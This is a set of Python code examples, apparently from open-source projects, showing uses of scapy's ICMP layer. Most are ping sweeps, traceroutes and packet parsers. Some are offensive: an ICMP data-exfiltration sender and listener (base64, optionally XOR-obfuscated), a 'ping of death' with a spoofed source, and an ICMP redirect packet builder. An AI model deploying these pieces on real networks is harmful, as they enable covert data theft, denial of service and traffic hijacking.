我们从Python开源项目中,提取了以下31个代码示例,用于说明如何使用scapy.all.ICMP。
def detect_inactive_hosts(scan_hosts):
    """Probe ``scan_hosts`` with ICMP and report which targets stayed silent.

    The function first re-registers itself through ``scheduler.enter`` with a
    delay of ``RUN_FREQUENCY`` so that it keeps running periodically, then
    sends one ICMP packet per target, prints one line per answering host and
    one line per silent host, and finally prints the number of silent hosts.

    Args:
        scan_hosts: Target specification passed to ``IP(dst=...)``; it can be
            a range such as ``10.0.2.2-4`` (see the Scapy docs for the
            accepted target syntax).

    Returns:
        list: The ``dst`` of every probe that received no answer.
    """
    scheduler.enter(RUN_FREQUENCY, 1, detect_inactive_hosts, (scan_hosts, ))
    inactive_hosts = []
    try:
        ans, unans = sr(IP(dst=scan_hosts)/ICMP(), retry=0, timeout=1)
        # Iterate the (sent, reply) pairs directly instead of passing a
        # callback to ans.summary(): the callback signature differs between
        # scapy releases, while unpacking the pairs works on all of them.
        for _sent, reply in ans:
            print(reply.sprintf("%IP.src% is alive"))
        for inactive in unans:
            print("%s is inactive" % inactive.dst)
            inactive_hosts.append(inactive.dst)
        print("Total %d hosts are inactive" % (len(inactive_hosts)))
    except KeyboardInterrupt:
        # Same effect as exit(0) without relying on the ``site`` helper.
        raise SystemExit(0)
    return inactive_hosts
def build_icmp(self):
    """Assemble the ICMP type 5 / code 1 packet used by this object.

    Layers, outermost first:
      * IP from ``self.gateway`` to ``self.target``
      * ICMP with type 5, code 1 and ``gw`` set to ``self.ip_address``
      * an embedded IP header from ``self.target`` to ``self.gateway``
      * an empty UDP header

    Returns:
        The stacked scapy packet; nothing is sent here.
    """
    outer_ip = IP(src=self.gateway, dst=self.target)
    redirect = ICMP(type=5, code=1, gw=self.ip_address)
    quoted_ip = IP(src=self.target, dst=self.gateway)
    return outer_ip / redirect / quoted_ip / UDP()
def cmd_ipscan(ip, iface, sleeptime, timeout, verbose):
    """Send one IP packet per protocol number (0-255) to ``ip`` and print replies.

    Every answer is printed as a one-line summary; answers that do not
    contain an ICMP layer are additionally dumped with ``show()``.

    Args:
        ip: Destination passed to ``IP(dst=...)``.
        iface: When truthy, stored in ``conf.iface`` before sending.
        sleeptime: Accepted but not used by this function.
        timeout: Accepted but not used; the ``sr()`` timeout is fixed at 2.
        verbose: When truthy, configures ``logging`` at INFO level.

    NOTE(review): ``sleeptime`` and ``timeout`` being ignored looks
    unintentional - confirm against the command-line definition.
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    conf.verb = False
    if iface:
        conf.iface = iface

    probes = IP(dst=ip, proto=(0, 255)) / "SCAPY"
    answered, _unanswered = sr(probes, retry=0, timeout=2, verbose=True)

    for _sent, reply in answered:
        print(reply.summary())
        if ICMP not in reply:
            reply.show()
def listen():
    """Log a start-up message, then sniff ICMP traffic and pass it to ``analyze``."""
    app_exfiltrate.log_message('info', "[icmp] Listening for ICMP packets..")
    # The capture filter keeps only packets whose first ICMP byte is 8
    # (echo requests) so that generated replies are not captured as well.
    echo_request_filter = "icmp and icmp[0]=8"
    scapy.sniff(filter=echo_request_filter, prn=analyze)
def test_icmp(self):
    """Send one ICMP packet to every key of ``self.destinations``.

    Each probe is sent with ``sr1``; the outcome is logged and stored in
    ``self.report`` under the destination key (the reply packet, or ``None``
    when ``sr1`` returned nothing).
    """

    def process_response(probe, echo_reply, dest):
        # sr1() returns a single reply packet or None - not an
        # (answered, unanswered) pair - so test for None instead of unpacking.
        if echo_reply is not None:
            log.msg("Received echo reply from %s: %s"
                    % (dest, echo_reply.summary()))
        else:
            log.msg("No reply was received from %s. Possible censorship event." % dest)
            log.debug("Unanswered packets: %s" % probe.summary())
        self.report[dest] = echo_reply

    for label in self.destinations:
        probe = IP(dst=label) / ICMP()
        # NOTE(review): no timeout is passed to sr1(); consider adding one so
        # a silent destination cannot stall the whole test.
        reply = sr1(probe)
        process_response(probe, reply, label)
def get_last_ping_reply_ts(path):
    """Return the latest timestamp among ICMP replies read from ``path``.

    Args:
        path: Capture location handed to ``read_pcap``.

    Returns:
        The largest ``packet.time`` among packets whose ICMP ``type`` equals
        ``TYPE_ICMP_REPLY``, or ``None`` when no such packet was read.
    """
    last_replied_ts = None
    for packet in read_pcap(path, lfilter=filter_icmp):
        if not filter_icmp(packet):
            continue
        if packet[scapy.ICMP].type != TYPE_ICMP_REPLY:
            continue
        # max(None, x) raises TypeError on Python 3, so the first reply has
        # to seed the running maximum explicitly.
        if last_replied_ts is None or packet.time > last_replied_ts:
            last_replied_ts = packet.time
    return last_replied_ts
def detect_inactive_hosts(scan_hosts):
    """Probe ``scan_hosts`` with ICMP and report which targets stayed silent.

    The function first re-registers itself through ``scheduler.enter`` with a
    delay of ``RUN_FREQUENCY`` so that it keeps running periodically, then
    sends one ICMP packet per target, prints one line per answering host and
    one line per silent host, and finally prints the number of silent hosts.

    The body is written so that it runs unchanged on Python 2 and Python 3.

    Args:
        scan_hosts: Target specification passed to ``IP(dst=...)``; it can be
            a range such as ``10.0.2.2-4`` (see the Scapy docs for specifying
            targets).

    Returns:
        list: The ``dst`` of every probe that received no answer.
    """
    scheduler.enter(RUN_FREQUENCY, 1, detect_inactive_hosts, (scan_hosts, ))
    inactive_hosts = []
    try:
        ans, unans = sr(IP(dst=scan_hosts)/ICMP(), retry=0, timeout=1)
        # ``lambda (s, r): ...`` is Python-2-only syntax (tuple parameters
        # were removed in Python 3); unpacking the pairs in a loop prints the
        # same lines on either interpreter.
        for _sent, reply in ans:
            print(reply.sprintf("%IP.src% is alive"))
        for inactive in unans:
            # A single parenthesised argument prints identically under the
            # Python 2 print statement and the Python 3 print function.
            print("%s is inactive" % inactive.dst)
            inactive_hosts.append(inactive.dst)
        print("Total %d hosts are inactive" % (len(inactive_hosts)))
    except KeyboardInterrupt:
        # Same effect as exit(0) without relying on the ``site`` helper.
        raise SystemExit(0)
    return inactive_hosts
def asns_in_traceroute(traceroute, asndb):
    """Collect the AS numbers of the hops found in ``traceroute``.

    Args:
        traceroute: Iterable of ``(sent, received)`` packet pairs.
        asndb: Object whose ``lookup(address)`` returns a 2-tuple with the
            AS number (or ``None``) as its first element.

    Returns:
        list: AS numbers in hop order; hops without a known AS are skipped.
    """
    hop_asns = []
    for _probe, reply in traceroute:
        # Only ICMP answers of type 11 (TTL exceeded) identify a hop.
        is_ttl_exceeded = reply.haslayer(scapy.ICMP) and reply.payload.type == 11
        if not is_ttl_exceeded:
            continue
        hop_asn, _prefix = asndb.lookup(reply.src)
        if hop_asn is None:
            continue
        hop_asns.append(hop_asn)
    return hop_asns
def generator(self, n, filename):
    """Write ``n`` ICMP packets addressed to 10.0.0.1 into a pcap file.

    Before generating, an estimated duration (a linear function of ``n``)
    is printed in seconds and minutes; afterwards the packet count is
    printed.

    Args:
        n: Number of packets to create.
        filename: Output path handed to ``wrpcap``.
    """
    estimate_seconds = 0.00114108 * n + 0.157758
    estimate_minutes = estimate_seconds / 60
    print('Generating packets, it will take %s seconds, moreless (%s, minutes)'
          % (estimate_seconds, estimate_minutes))

    packets = []
    for _ in range(n):
        packets.append(IP(dst='10.0.0.1') / ICMP())

    wrpcap(filename, packets)
    print('%s packets generated.' % n)
def ping_of_death(self, target):
    """Build and send a single oversized ICMP packet with a random source string.

    The code is documented as-is and deliberately left unchanged.

    Args:
        target: Second positional argument given to ``IP(...)``.
    """
    from scapy.all import IP, ICMP, send
    # Dotted-quad string made of four random integers in the range 1..254.
    src = "%i.%i.%i.%i" % (
        random.randint(1, 254),
        random.randint(1, 254),
        random.randint(1, 254),
        random.randint(1, 254))
    # NOTE(review): both values are passed positionally rather than as
    # src=/dst= keywords - verify against the scapy Packet constructor what
    # they actually populate.
    ip_hdr = IP(src, target)
    # Payload is str() of 65500 random bytes.
    # NOTE(review): on Python 3 str(bytes) yields the repr text, not the raw
    # bytes - confirm which interpreter this targets.
    _packet = ip_hdr / ICMP() / (str(os.urandom(65500)))
    send(_packet)
def get_gateway(self):
    """Return the source address of the answer to a TTL-0 ICMP probe.

    One ICMP packet with ``ttl=0`` and payload ``"X"`` is sent towards
    ``www.google.com``; presumably the nearest router answers it, which is
    why the reply's source is treated as the gateway.

    Returns:
        The ``src`` field of the reply, or ``None`` when ``sr1`` returned no
        packet (previously this case raised ``AttributeError``).
    """
    reply = sr1(IP(dst="www.google.com", ttl=0) / ICMP() / "X", verbose=0)
    if reply is None:
        return None
    return reply.src
def heartbeat_call(self, event):
    """Ping every discovered WiFiTrilat server without waiting for the result.

    Each entry returned by ``self.client.discover()`` is reduced to the text
    between its first character and the ``'/WiFi'`` marker, and that host is
    pinged four times through ``cli.execute``.

    Args:
        event: Not used by this handler.
    """
    try:
        from shlex import quote
    except ImportError:  # Python 2
        from pipes import quote

    for service in self.client.discover():
        # NOTE(review): when '/WiFi' is absent, find() returns -1 and the
        # slice silently drops the last character instead.
        host = service[1:service.find('/WiFi')]
        # The command runs through a shell, so quote the discovered name to
        # keep shell metacharacters in it from being interpreted. Plain
        # hostnames and IP addresses pass through quote() unchanged.
        cli.execute(command='ping -c 4 %s' % quote(host),
                    wait=False, shellexec=True)
def send(data):
    """Base64-encode ``data`` and emit it as the payload of one ICMP frame.

    The encoded length is logged first; the frame is addressed to
    ``config['target']`` and sent at layer 2 with ``scapy.sendp``.

    Args:
        data: Bytes to encode and send.
    """
    encoded = base64.b64encode(data)
    notice = "[icmp] Sending {} bytes with ICMP packet".format(len(encoded))
    app_exfiltrate.log_message('info', notice)

    frame = scapy.Ether() / scapy.IP(dst=config['target']) / scapy.ICMP() / encoded
    scapy.sendp(frame, verbose=0)
def analyze(packet):
    """Log a sniffed packet and forward its base64-decoded payload.

    Args:
        packet: Sniffed packet; ``packet.payload`` must expose ``src`` and
            ``dst``, and ``packet.load`` is expected to hold base64 data.
    """
    src = packet.payload.src
    dst = packet.payload.dst
    try:
        app_exfiltrate.log_message(
            'info', "[icmp] Received ICMP packet from: {0} to {1}".format(src, dst))
        app_exfiltrate.retrieve_data(base64.b64decode(packet.load))
    except Exception:
        # Best effort: a packet without a usable payload is dropped silently.
        # Catching Exception instead of using a bare ``except`` lets
        # KeyboardInterrupt and SystemExit still stop the sniffer.
        pass
def make_stamp(pkt):
    """Summarise a packet as ``(source ip, destination ip, protocol name)``.

    Args:
        pkt: Packet supporting ``layer in pkt`` and ``pkt[layer]``.

    Returns:
        A 3-tuple whose last element is ``"TCP"``, ``"UDP"`` or ``"ICMP"``
        (checked in that order), or ``None`` when the packet has no IP layer
        or none of those three layers.
    """
    if s.IP not in pkt:
        return None

    ip_send = pkt[s.IP].src
    ip_rec = pkt[s.IP].dst

    transports = ((s.TCP, "TCP"), (s.UDP, "UDP"), (s.ICMP, "ICMP"))
    for layer, protocol in transports:
        if layer in pkt:
            return ip_send, ip_rec, protocol

    # Neither TCP, UDP nor ICMP.
    return None
def ping_host(self, ip):
    """Probe the host at ``ip`` and report whether it answered.

    Args:
        ip: Address of the host to probe.

    Returns:
        tuple: ``(host, ONLINE, response_time)`` when an answer arrived,
        where ``response_time`` is the unrounded difference between the
        reply's ``time`` and the request's ``sent_time``; otherwise
        ``(host, OFFLINE, None)``. ``host`` is the resolved name when name
        resolution is enabled and succeeds, else ``ip``.

    Raises:
        PermissionException: When sending fails with ``PermissionError``.
    """
    # Form the probe packet for this address.
    packet = self.__gen_packet(ip)
    try:
        # Send and wait for the response.
        answers, _unanswered = self.__send_recv(packet)
    except PermissionError:
        raise PermissionException

    host = ip
    if self.__resolve_names:
        try:
            host = gethostbyaddr(ip)[HOST_NAME_INDEX]
        except herror:
            # Resolution failed: fall back to the plain address.
            host = ip

    if not answers:
        # The unanswered list is deliberately not indexed here: nothing from
        # it is returned, and indexing an empty list would raise.
        return host, OFFLINE, None

    answer = answers[FIRST_INDEX]
    request = answer[REQUEST_INDEX]
    response = answer[RESPONSE_INDEX]
    return host, ONLINE, response.time - request.sent_time
def test_icmp_ping(self):
    """Send one ICMP packet to the configured target and display the replies.

    Returns:
        The deferred returned by ``self.sr``; a callback attached to it
        prints the result and calls ``show()`` on every received packet.
    """

    def finished(packets):
        # A single parenthesised argument prints identically under the
        # Python 2 print statement and the Python 3 print function.
        print(packets)
        answered, _unanswered = packets
        for _snd, rcv in answered:
            rcv.show()

    packets = IP(dst=self.localOptions['target'])/ICMP()
    d = self.sr(packets)
    d.addCallback(finished)
    return d
def test_icmp_ping(self):
    """Generator form of the ICMP ping test.

    Yields the result of ``self.sr`` for one ICMP packet addressed to
    ``self.localOptions['target']``; once resumed with the
    ``(answered, unanswered)`` pair it calls ``show()`` on every reply.

    NOTE(review): presumably driven by a coroutine-style decorator that is
    not visible here.
    """
    target = self.localOptions['target']
    probe = IP(dst=target) / ICMP()
    result = yield self.sr(probe)
    answered, _unanswered = result
    for _sent, reply in answered:
        reply.show()
def ICMPTraceroute(self, host):
    """Send ICMP probes to ``host`` across the configured TTL range.

    ``host`` is added to ``self.hosts`` when not already present. The
    returned deferred is scheduled to fire with ``self`` after
    ``self.timeout``; the probes are sent right after scheduling it.

    Args:
        host: Destination passed to ``IP(dst=...)``.

    Returns:
        The deferred that fires after ``self.timeout``.
    """
    known_hosts = self.hosts
    if host not in known_hosts:
        known_hosts.append(host)

    done = defer.Deferred()
    reactor.callLater(self.timeout, done.callback, self)

    ip_layer = IP(dst=host, ttl=(self.ttl_min, self.ttl_max), id=RandShort())
    self.sendPackets(ip_layer / ICMP(id=RandShort()))
    return done
def packetReceived(self, packet):
    """Buffer ``packet`` when its second layer is ICMP, UDP or TCP.

    Args:
        packet: Object exposing ``getlayer(index)``.
    """
    second_layer = packet.getlayer(1)
    if not second_layer:
        return
    if isinstance(second_layer, (ICMP, UDP, TCP)):
        self._recvbuf.append(packet)
def filter_icmp(packet):
    """Tell whether ``packet`` carries an ICMP layer.

    Returns:
        bool: Result of the ``scapy.ICMP in packet`` membership test.
    """
    has_icmp = scapy.ICMP in packet
    return has_icmp
def send(data):
    """XOR ``data``, base64-encode it and emit it as one ICMP frame.

    The data first goes through ``app_exfiltrate.xor``; the encoded length
    is logged, then the frame addressed to ``config['target']`` is sent at
    layer 2 with ``scapy.sendp``.

    Args:
        data: Value handed to ``app_exfiltrate.xor``.
    """
    obfuscated = app_exfiltrate.xor(data)
    encoded = base64.b64encode(obfuscated)
    notice = "[icmp] Sending {} bytes with ICMP packet".format(len(encoded))
    app_exfiltrate.log_message('info', notice)

    frame = scapy.Ether() / scapy.IP(dst=config['target']) / scapy.ICMP() / encoded
    scapy.sendp(frame, verbose=0)
def listen():
    """Log a start-up message, then sniff all ICMP traffic into ``analyze``."""
    app_exfiltrate.log_message('info', "[icmp] Listening for ICMP packets..")
    capture_filter = "icmp"
    scapy.sniff(filter=capture_filter, prn=analyze)
def cmd_ping(ip, count, timeout, wait, verbose):
    """Repeatedly send the same ICMP echo request to ``ip`` and print results.

    Args:
        ip: Destination address.
        count: Number of probes to send; ``0`` means keep going forever.
        timeout: Per-probe timeout handed to ``sr1``.
        wait: Pause passed to ``sleep`` between two probes.
        verbose: When truthy each reply is dumped with ``show()``, otherwise
            its one-line summary is printed.

    Returns:
        bool: Always ``True`` once the loop ends.
    """
    conf.verb = False

    ip_layer = IP(dst=ip, tos=0, id=1, flags=0, frag=0, ttl=64,
                  proto=1)  # proto 1 = icmp
    echo_request = ICMP(type=8, code=0, id=0, seq=0)  # type 8 = echo-request
    probe = ip_layer / echo_request

    attempts = 0
    while True:
        reply = sr1(probe, timeout=timeout)
        if not reply:
            print('Timeout')
        elif verbose:
            reply.show()
        else:
            print(reply.summary())

        attempts += 1
        if count == 0 or attempts != count:
            sleep(wait)
            continue
        break

    return True
def cmd_icmp(ip, verbose):
    """Send several ICMP message types to ``ip`` and show what comes back.

    The same packet is reused for an echo request (8), a timestamp request
    (13) and an information request (15), each with code 0 and a 0.2 second
    timeout. A reply is dumped with ``show()``; silence is reported as
    ``NOT ANSWER!!!``.

    Args:
        ip: Destination address.
        verbose: Accepted but not used by this function.

    Returns:
        bool: Always ``True``.
    """
    conf.verb = False

    pkt = IP(dst=ip) / ICMP()

    messages = (
        (8, 0),   # echo request
        (13, 0),  # timestamp
        (15, 0),  # info request
    )

    for itype, icode in messages:
        pkt[ICMP].type = itype
        pkt[ICMP].code = icode
        ans = sr1(pkt, timeout=0.2)
        if ans:
            # show() prints the dissection itself and returns None, so
            # wrapping it in print() only added a stray "None" line.
            ans.show()
        else:
            print("NOT ANSWER!!!")

    return True